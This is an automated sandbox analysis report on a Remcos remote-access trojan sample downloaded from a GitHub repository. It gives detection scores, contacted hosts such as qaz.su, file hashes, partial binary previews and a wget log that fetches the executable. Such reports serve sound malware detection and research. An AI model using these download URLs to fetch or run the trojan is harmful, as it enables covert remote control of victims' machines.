    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Command and Scripting Interpreter
    1
    DLL Side-Loading
    1
    Process Injection
    1
    Masquerading
    OS Credential Dumping121
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading
    1
    Disable or Modify Tools
    LSASS Memory1
    Process Discovery
    Remote Desktop ProtocolData from Removable Media3
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
    Virtualization/Sandbox Evasion
    Security Account Manager41
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Process Injection
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput Capture4
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Timestomp
    LSA Secrets12
    System Information Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1644538 URL: https://github.com/Ox47100/... Startdate: 20/03/2025 Architecture: WINDOWS Score: 72 23 raw.githubusercontent.com 2->23 25 qaz.su 2->25 27 github.com 2->27 35 Yara detected Powershell download and execute 2->35 37 Sigma detected: Invoke-Obfuscation CLIP+ Launcher 2->37 39 Sigma detected: Invoke-Obfuscation VAR+ Launcher 2->39 7 Remcos-RAT-3.8.0.exe 15 4 2->7         started        11 cmd.exe 2 2->11         started        signatures3 process4 dnsIp5 29 qaz.su 80.87.203.251, 443, 49724, 49725 THEFIRST-ASRU Russian Federation 7->29 41 Antivirus detection for dropped file 7->41 43 Multi AV Scanner detection for dropped file 7->43 13 WerFault.exe 22 16 7->13         started        15 wget.exe 2 11->15         started        19 conhost.exe 11->19         started        signatures6 process7 dnsIp8 31 github.com 140.82.114.4, 443, 49722 GITHUBUS United States 15->31 33 raw.githubusercontent.com 185.199.110.133, 443, 49723 FASTLYUS Netherlands 15->33 21 C:\Users\user\...\Remcos-RAT-3.8.0.exe, PE32 15->21 dropped file9

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe0%Avira URL Cloudsafe
    SourceDetectionScannerLabelLink
    C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe100%AviraHEUR/AGEN.1313721
    C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe79%ReversingLabsByteCode-MSIL.Trojan.RealProtectPENGSD
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://qaz.su0%Avira URL Cloudsafe
    http://qaz.im0%Avira URL Cloudsafe
    https://qaz.su/style.css?v=20%Avira URL Cloudsafe
    https://qaz.su/disclaimer0%Avira URL Cloudsafe
    https://qaz.su/index.php?a=download&q=file_not_exist0%Avira URL Cloudsafe
    https://qaz.su/index.php?a=admin0%Avira URL Cloudsafe
    http://qaz.sud0%Avira URL Cloudsafe
    https://qaz.su/load/rTE6bi/b733f346-f3cc-4059-b212-d58a8e4d2f060%Avira URL Cloudsafe
    https://qaz.su/js/jquery.js0%Avira URL Cloudsafe
    http://microsoft.coCn0%Avira URL Cloudsafe
    https://qaz.su/privacy0%Avira URL Cloudsafe
    https://qaz.su/favicon.ico0%Avira URL Cloudsafe
    https://qaz.su/0%Avira URL Cloudsafe
    https://qaz.su/js/jquery-1.12.4.min.js0%Avira URL Cloudsafe
    https://qaz.su/index.php?a=user0%Avira URL Cloudsafe
    https://qaz.su/tos0%Avira URL Cloudsafe
    http://qaz.is0%Avira URL Cloudsafe
    https://qaz.su/contact0%Avira URL Cloudsafe
    https://qaz.su/js/jquery.tipsy.js0%Avira URL Cloudsafe
    https://qaz.su0%Avira URL Cloudsafe
    https://qaz.su/css/font-awesome.css0%Avira URL Cloudsafe

    Download Network PCAP: filteredfull

    NameIPActiveMaliciousAntivirus DetectionReputation
    qaz.su
    80.87.203.251
    truefalse
      unknown
      github.com
      140.82.114.4
      truefalse
        high
        raw.githubusercontent.com
        185.199.110.133
        truefalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exefalse
            high
            https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exefalse
              high
              https://qaz.su/load/rTE6bi/b733f346-f3cc-4059-b212-d58a8e4d2f06false
              • Avira URL Cloud: safe
              unknown
              https://qaz.su/index.php?a=download&q=file_not_existfalse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://qaz.suRemcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D4F000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://qaz.imRemcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exeTwget.exe, 00000002.00000003.1321521516.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.1321935695.0000000002B5D000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://qaz.su/disclaimerRemcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://upx.sf.netAmcache.hve.6.drfalse
                  high
                  https://qaz.su/style.css?v=2Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.wget.exe, 00000002.00000002.1321859775.0000000000B78000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exetawget.exe, 00000002.00000002.1321812511.0000000000AD0000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://qaz.su/js/jquery.jsRemcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://microsoft.coCnRemcos-RAT-3.8.0.exe, 00000003.00000002.1401494610.0000000006210000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://qaz.sudRemcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D4F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exexwget.exe, 00000002.00000003.1321521516.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.1321935695.0000000002B5D000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://qaz.su/index.php?a=adminRemcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://qaz.su/Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://qaz.su/privacyRemcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://qaz.su/favicon.icoRemcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://qaz.su/js/jquery-1.12.4.min.jsRemcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://qaz.su/contactRemcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://qaz.su/index.php?a=userRemcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://qaz.su/js/jquery.tipsy.jsRemcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://qaz.su/tosRemcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://qaz.suRemcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D70000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRemcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D33000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://qaz.isRemcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exeRxzwget.exe, 00000002.00000003.1321521516.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.1321935695.0000000002B5D000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://qaz.su/css/font-awesome.cssRemcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            140.82.114.4
                            github.comUnited States
                            36459GITHUBUSfalse
                            80.87.203.251
                            qaz.suRussian Federation
                            29182THEFIRST-ASRUfalse
                            185.199.110.133
                            raw.githubusercontent.comNetherlands
                            54113FASTLYUSfalse
                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1644538
                            Start date and time:2025-03-20 17:01:28 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 4m 7s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:urldownload.jbs
                            Sample URL:https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:14
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal72.evad.win@6/7@3/3
                            EGA Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 4
                            • Number of non-executed functions: 0
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 40.71.93.126, 184.31.69.3, 40.126.24.84, 20.12.23.50, 23.96.180.189, 150.171.27.10, 23.44.201.36
                            • Excluded domains from analysis (whitelisted): www.bing.com, onedsblobvmssprdeus02.eastus.cloudapp.azure.com, fs.microsoft.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, g.bing.com, umwatson.events.data.microsoft.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target Remcos-RAT-3.8.0.exe, PID 8472 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            • VT rate limit hit for: https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe
                            TimeTypeDescription
                            12:02:25API Interceptor10x Sleep call for process: Remcos-RAT-3.8.0.exe modified
                            12:02:29API Interceptor1x Sleep call for process: WerFault.exe modified
                            No context
                            No context
                            No context
                            No context
                            No context
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.166358160959894
                            Encrypted:false
                            SSDEEP:192:e3g73Xf0BU/KaGc+LyIZzuiFWZ24IO8U:t738BU/KaPcDZzuiFWY4IO8U
                            MD5:AA4085EDAD3376FBD07FD37693179D06
                            SHA1:12F85DDA1C118303DE355C8315E0179437C267B5
                            SHA-256:5B0AFF85F85097BEC523F990F152A8CC87921BDD7EACE958417303336BA439AF
                            SHA-512:8551C679644461CC626436036E6F09FFB23F57F79F0A6252D696104633CDEAB8945B8F7B565D07E242FD711DDD8FFEF77D3B15F5B377E72F52C46E4CF360A6F9
                            Malicious:false
                            Reputation:low
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.9.6.0.1.4.7.4.9.0.3.5.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.9.6.0.1.4.8.1.6.2.2.1.2.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.0.9.a.2.b.c.-.e.5.9.9.-.4.9.0.d.-.a.8.a.3.-.a.4.b.2.7.d.6.2.9.b.a.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.2.5.5.9.3.2.0.-.2.8.3.9.-.4.4.2.3.-.8.c.d.d.-.0.c.5.d.7.1.f.3.d.1.5.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.m.c.o.s.-.R.A.T.-.3...8...0...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.y.s.t.e.m.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.1.1.8.-.0.0.0.1.-.0.0.1.8.-.3.5.6.0.-.e.3.7.7.b.1.9.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.2.9.a.c.f.7.d.2.5.1.c.8.5.7.6.1.5.c.8.a.d.2.8.9.9.e.1.3.f.a.a.0.0.0.0.0.0.0.0.!.0.0.0.0.d.1.8.a.8.9.6.1.0.c.4.a.b.5.f.f.7.3.5.3.2.a.6.0.8.e.3.b.a.0.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Mini DuMP crash report, 15 streams, Thu Mar 20 16:02:27 2025, 0x1205a4 type
                            Category:dropped
                            Size (bytes):298658
                            Entropy (8bit):3.558159919841817
                            Encrypted:false
                            SSDEEP:3072:id6uX7LTgJjnyesRZzHtC5Pym2p4uEqSB:iguX/TgdnyesTNC5kp4b
                            MD5:A554BBD33E151D20B0D07F2C7E20BC83
                            SHA1:700D51F3D34844683E0366D0E497E3E72D07177E
                            SHA-256:F523A12F071B21A007B250592873361EFA3DA30AE0F758A24434548DD5F5A04A
                            SHA-512:B04A9A4717FD334799E28F971D395960A80662DE41CBF956D23958BFEA280EB3ED34F093EFB9AB2F522B88C3EDEC075D065869E8B4F86E79CD39A0B4D07D0EDA
                            Malicious:false
                            Reputation:low
                            Preview:MDMP..a..... ........<.g....................................<....(......4$..Hc..........`.......8...........T............U...9..........L(..........8*..............................................................................eJ.......*......GenuineIntel............T........!...<.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8430
                            Entropy (8bit):3.695416714182132
                            Encrypted:false
                            SSDEEP:192:R6l7wVeJh8686YV4ySU9p350WjgmfZnJprV89bm2dZsfrim:R6lXJ6686YqySU9pWWjgmfJWm2dyfP
                            MD5:7CDC999EA885600E2D21A2B4D4D0AB04
                            SHA1:07644A9E82A461D2C2FD924075688C464A7B3886
                            SHA-256:95C047FEFD0305B8683D939BB77D1C929FEDCF58F34B88A6D45C2006E350B008
                            SHA-512:4B5C428751F47037A0697405B3D5DB354754CDEDF9131EFB0EACF7128E29D9E1D66735AD7B234B2A9F6C7F70FF09A6EDCFB338C456606221904EEC575C84BFAA
                            Malicious:false
                            Reputation:low
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.4.7.2.<./.P.i.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4777
                            Entropy (8bit):4.4848571345548205
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zs0Jg77aI916WOa8tLYm8M4JkW3FOj+q8v1WLQBCBYd:uIjfyI7H7Ol0JyjKmgCBYd
                            MD5:974F2DABBAFE42D974AB4BB5F0EEF3ED
                            SHA1:A0419E1E8BE9213250978B427EE68E778FBFABE7
                            SHA-256:0A42166BC162BB2DE7FC527A204C964E799957B316B04628B8BA7E042ABAC1FD
                            SHA-512:E7EC9F8846FE8D2B29A6DE70AC4576276FCDFFE9F2DBB817557CB39BD0B2BBE3C7F1DF96E3382C8EEE42792956D15B455EF8455520D6ADC283660318BA622D57
                            Malicious:false
                            Reputation:low
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="769385" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Windows\SysWOW64\cmd.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:modified
                            Size (bytes):1113
                            Entropy (8bit):5.215768150205967
                            Encrypted:false
                            SSDEEP:24:bu+no51DxePnSMGs+2U9ovzEMGs+2tMGjMGYvMGjMGG6xePg+I3Pb9SMvQPb9SpP:bTnobDiO2vXO2ux6x565b9SYyb9S/Z
                            MD5:1A39C2FC4E006B0C9A98E781D497BAE6
                            SHA1:0ACFD42206EE553D01C490AD9FABDBDB03066BCA
                            SHA-256:7EB876DBB755A0E534B803DBD0CE19B4B675D172D033006304AFDFFDA89B5AE9
                            SHA-512:D439DA555A5320E2F0124A8A92DCB5C66B9E805B77696BE95B3946DBACE23F05CADEE2991E048191431E960D7D7394345188B7805D31F936DD3D031C1A4B4141
                            Malicious:false
                            Reputation:low
                            Preview:--2025-03-20 12:02:20-- https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe..Resolving github.com (github.com)... 140.82.114.4..Connecting to github.com (github.com)|140.82.114.4|:443... connected...HTTP request sent, awaiting response... 302 Found..Location: https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exe [following]..--2025-03-20 12:02:21-- https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exe..Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.108.133, 185.199.111.133, .....Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected...HTTP request sent, awaiting response... 200 OK..Length: 7168 (7.0K) [application/octet-stream]..Saving to: 'C:/Users/user/Desktop/download/Remcos-RAT-3.8.0.exe'.... 0K ....... 100% 240K=0.03s.
                            Process:C:\Windows\SysWOW64\wget.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):7168
                            Entropy (8bit):4.6253897524833
                            Encrypted:false
                            SSDEEP:96:oz4/c4Kr6GgZ2+dzcMsio1ZafV/WyDhh1e35YZNW+hC/zNt:64KuG+2I5xfVWyDhh1eG10p
                            MD5:6166F997B4BB3428AE0D9D4B4E1F0DB2
                            SHA1:D18A89610C4AB5FF73532A608E3BA0038D6146E0
                            SHA-256:3E3EF95E4D20E1CF759021D91F834B6F2C82A1A9DBAB3CAB1605A55BC85D5BE5
                            SHA-512:087BE6857F602A648C612C9C849560C8C803182BF08BBDBC41F58EB17E28A1822DED1B1FB45C9A007722B6C6A19754671159A0A3510CC80188D3C145AB5A297C
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 79%
                            Reputation:low
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..............0... ...@....@.. ....................................`..................................0..O....@.......................`......./..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................0......H........"..............4/...............................................0...........r...p(............9o....r...p..(......r5..p(........9..........(.....rc..p.......(.....r...pr|..p...(......s..........r...p.(....o.........,...o...........(.....r...p.(....(....&.....(.....~....r...p.o.........(....o......8.....rc..p.......(.....r5..p....(....&s...........r*..p.(....o..........(.....r*..p.(....(....&.....(.....~....r...p.o.........(....o..........,...o...........(..........(.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.461264989737572
                            Encrypted:false
                            SSDEEP:6144:L52cwMWh0HQdcETgP70KkM8NqaCskjPrWBYCw6o+u8O/zvX9smlYXgTw:d2n8BkRFBYCfkDztFlVw
                            MD5:8B226B9E848ED00CD479374CBB0EAF3B
                            SHA1:7BABDC192C0F62327CD59ECE7B33850878C1A5BF
                            SHA-256:9348D3FFFC195722D68F94191CD82822AE7410D21BA1142752DD64171AF73A6C
                            SHA-512:050BFED7EE0FD7E71EE51E333C8AF8914EBE0E12EAB8AF7C8727E4101EB0539387F45BD349F88E57E5FD8B4E5D5E62CAFDE913C2A5F356B954DD0844C713DAD5
                            Malicious:false
                            Reputation:low
                            Preview:regfL...L....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...z...................................................................................................................................................................................................................................................................................................................................................N........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            No static file info

                            Download Network PCAP: filteredfull

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2025-03-20T17:02:28.362047+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54972580.87.203.251443TCP
                            • Total Packets: 41
                            • 443 (HTTPS)
                            • 53 (DNS)
                            TimestampSource PortDest PortSource IPDest IP
                            Mar 20, 2025 17:02:22.185954094 CET49722443192.168.2.5140.82.114.4
                            Mar 20, 2025 17:02:22.185995102 CET44349722140.82.114.4192.168.2.5
